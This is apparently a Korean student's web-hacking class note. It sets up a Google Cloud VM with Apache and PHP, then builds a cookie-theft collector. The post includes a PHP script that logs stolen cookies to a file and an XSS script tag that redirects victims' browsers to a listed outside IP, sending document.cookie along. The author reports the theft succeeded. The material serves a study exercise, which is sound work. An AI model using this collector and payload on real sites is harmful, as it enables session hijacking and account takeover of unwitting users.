(1) 해당 1부에서 구글 클라우드 VM 만들기를 아주 자세하게 따라할 수있다.
https://opencourse.tistory.com/591?category=354408
(2) 3부에 마지막에 있는 방화벽 설정을 따라한다.
https://opencourse.tistory.com/596?category=354408
(3) SSH부분을 실행시킨다.
[아파치 서버 설치]
$ sudo apt-get update
$ sudo apt-get install apache2
[아파치 서버 실행]
$ sudo service apache2 start
기본 페이지가 뜨는 것을 확인한다.
[PHP 설치 연동]
$sudo apt install php php-mysql
#디렉토리 이동
cd /var/www/html
#파일 생성
(1) cat > file.php
(2) 내용 입력
<?php
phpinfo();
?>
(3)Ctrl + D 키 입력으로 종료
PHP기본 페이지 확인
[쿠키 탈취]
파일 참고 사이트: 함꼐 스터디하시는 분의 글에 도움을 많이 받았다.
https://hanuscrypto.tistory.com/83#comment6342979
cookie.php 빈cookie.txt 를 만들고 원하는 곳에 스크립트를 삽입한다.
# cookie.php
$cookie=$_GET[cookie];
$save_file=fopen("cookie.txt","a");
fwrite($save_file,$cookie);
fclose($save_file);
# script
<script>document.location="http://34.145.83.227/cookie.php?cookie="+document.cookie;</script>
쿠키 탈취에 성공했다.
'Web hacking > Nomaltic) 웹 해킹 수업 노트 👩💻' 카테고리의 다른 글
[12주차] SSRF 개념 및 실습 (0) | 2022.02.03 |
---|---|
[12주차] JWT 개념 (0) | 2022.02.03 |
[14주차] 금취분평 취약점, XXE 취약점 (0) | 2022.01.20 |
[실습] 쿠폰 중복 적용 취약점 (0) | 2022.01.14 |
[실습]유추 가능한 인증정보 이용 취약점 (0) | 2022.01.14 |